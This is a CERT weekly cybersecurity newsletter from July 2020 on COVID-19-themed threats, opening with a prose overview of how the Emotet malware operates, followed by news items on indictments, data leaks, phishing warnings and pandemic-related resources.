COVID-19: CYBERSECURITY WATCH #16 – July 31, 2020

In light of the current health crisis, the CERT of (CERT-DS) will implement a monitoring and alert system linked to the impacts and consequences of COVID-19 on cybersecurity. This monitoring, which can be shared freely, is intended to:

  • Identify the biggest threats to computer systems;
  • Share the resources and tools necessary to grasp and prevent ISS risks;
  • Highlight the best digital practices to adopt in the face of this crisis.

In order to better understand the threats, we will also do a “threat focus” on one of the attacks reported each week. A detailed description and modus operandi of the attack will be made.

Each week’s main news items are grouped into four categories: Threats, Fraud, Useful Resources and Other News.

  • Threats” include malware, phishing and ransomware campaigns, as well as cyberattacks on major infrastructures;
  • Fraud” includes scams and fake news;
  • Useful Resources” refers to the information and tools needed to deal with this health crisis;
  • Other News” combines a variety of information such as government measures taken in the area of cybersecurity.


Focus on the Emotet malware

Attack: In its July 2020 report on threats exploiting COVID-19, McAfee identifies Emotet as one of the most widely distributed malwares
Method: Phishing Campaigns
Target: Cybersecurity professionals
Publication date: 07/22/2020


Emotet is a Trojan type of malware that spreads mainly via spam e-mail campaigns. It appeared during the year 2014 and was originally used to steal bank information from its victims via Man-in-the-Browser attacks. It is now used as a malware dropper and is often associated with the TrickBot, IceID or Zeus Panda malware families.

While Emotet has been keeping a low profile for some time, recent events related to COVID-19 have favored its reintroduction via massive phishing campaigns on virus-related topics targeting both companies and individuals.

Modus Operandi

An Emotet campaign consists of several stages. Phishing e-mails containing an Office document or a download link [to an Office document] are sent to victims. The file contains a macro running PowerShell to retrieve the Emotet (.exe) binary from one of the command and control (CnC/C2) servers listed in the macro. Macros are generally disabled by default on most computers. To circumvent this setting, the victim is invited to enable them to view the document. The malware then creates a service in order to maintain its access to the infected machine and can then send information back to the C2 server.

Emotet uses multiple evasion techniques making its detection by analysis tools complex:

  • The use of polymorphism. This means that it can change its representation at each download, thus escaping signature-based detections very much used by traditional anti-viruses;
  • A sandbox detection mechanism. The malware identifies that it is running in a virtualized environment and does not activate its malicious code;
  • Encryption of HTTP communications between the malware and the C2 server.

Emotet is composed of several modules allowing it to spread via the e-mails that the victim sends but also like a worm type of malware in a corporate network via the use of known vulnerabilities (EternalBlue) or the bruteforce of user accounts using a list of frequently used passwords.

As soon as Emotet gains persistence on a machine, attackers sell access to that infected computer to other cybercriminals. This is commonly known as Malware-as-a-Service (MaaS) or Cybercrime-as-a-Service (CaaS). MaaS/CaaaS “clients” can then leverage this access to install other malwares, which can be used to steal confidential data or to run ransomwares on the internal network of the victim company.



Attack: U.S. Department of Justice indicts two Chinese cybercriminals for theft of confidential information, including research on COVID-19
Method: Data theft
Target: Public and private entities, mostly in the United States
Publication date: 07/21/2020
Description: Li Xiaoyu and Dong Jiazhi are accused of running a decade-long hacking campaign targeting public and private entities in various countries. Recently, they reportedly attempted to penetrate networks of companies and research institutes working on COVID-19 testing and vaccine development. In some cases, they allegedly worked for the Chinese intelligence services and in others for personal gains.


Attack: A cybercriminal posts medical communications about several thousand Australians on the Internet, including some proven COVID-19 cases
Method: Data theft
Target: Communication system of medical establishments in Western Australia
Publication date: 07/20/2020
Description: The cybercriminal exploited the lack of encryption in a pager communication network used by medical facilities in Western Australia. The stolen data contains phone numbers, addresses and medical status of thousands of patients and medical professionals in the state. The website on which it was posted has since been closed down and the compromised communication service has been deactivated.



Attack: Punjab police state warns of COVID-19 related phishing campaign
Method: Phishing
Surface/Application: Instant messaging services (SMS and WhatsApp)
Publication date: 07/25/2020
Description: The fraudulent URL link circulating on instant messaging services claims to provide government financial assistance under COVID-19. If victims click on the link, they are redirected to a survey that, once completed, prompts them to share a link with their contacts. Citizens are reminded not to click on these fraudulent links, which can spread malware or allow cybercriminals to steal financial data.


Useful ressources

Type of resources: The U.S. Internal Revenue Service (IRS) publishes a list of tax frauds exploiting COVID-19
Target: General public
Publication date: 07/16/2020
Description: Called “Dirty Dozen”, this list, published annually, provides an overview of tax frauds. In 2020, particular emphasis is placed on those who exploited the COVID-19 pandemic to obtain personal data of thousands of taxpayers. The most commonly used schemes are phishing campaigns, fake charities, or scams circulating on social networks.


Type of resources: In France, the National Pilot Committee on Digital Ethics (CNPEN) publishes a report on the use of digital tools in telemedicine in the context of the COVID-19 pandemic
Target: Healthcare institutions
Publication date: 07/21/2020
Description: Faced with the upheaval caused by the COVID-19 pandemic in terms of medical practices and within healthcare institutions, this report emphasizes the need for an ethical and legal framework for new digital tools. The issue of personal data protection and the awareness of healthcare personnel to the new digital tools are also one of the central issues of this report.


Type of resources: Tencent has developed a tool based on Artificial Intelligence to anticipate the severe symptoms of COVID-19
Target: Healthcare institutions
Publication date: 07/15/2020
Description: Based on a statistical model called “survival analysis,” the artificial intelligence (AI) used by Tencent’s researchers can process a large amount of medical data about patients’ health problems and family history. This AI can then predict the risk that patients with COVID-19 will develop severe symptoms based on their clinical characteristics.


Type of resources: Facebook launches an anti-disinformation section in its COVID-19 Information Center
Target: General public
Publication date: 07/15/2020
Description: Facebook has invested several million euros in its strategy to combat misinformation. The social network advocates access to quality information and the definitive removal of harmful content, such as misleading advertisements for the sale of medical products (medical masks, hand sanitizers, COVID-19 test kits, etc.).


Other News

Country: International
Subject: Google will block ads on websites and applications spreading “dangerous content” about the COVID-19 Pandemic
Publication date: 07/17/2020
Description: The measure, which will begin on August 18, concerns false allegations that go against the authoritative scientific consensus and that may contribute to conspiracy theories about COVID-19, such as anti-vaccine promotions or content that encourages users to reject treatment. In addition, if publishers fail to comply with the anti-disinformation policy, Google will be able to demonetize their website.


Country: International
Subject: Siemens deploys an application to facilitate employees return to the office under COVID-19
Publication date: 07/23/2020
Description: Called Comfy, this application will provide employees with real-time information on the occupancy rate of their workplaces. This will help regulate the presence of employees on the working area. More than 600 facilities should be equipped, encompassing 100,000 employees in 30 countries.

Back to the previous newsletters of CYBERSECURITY WATCH :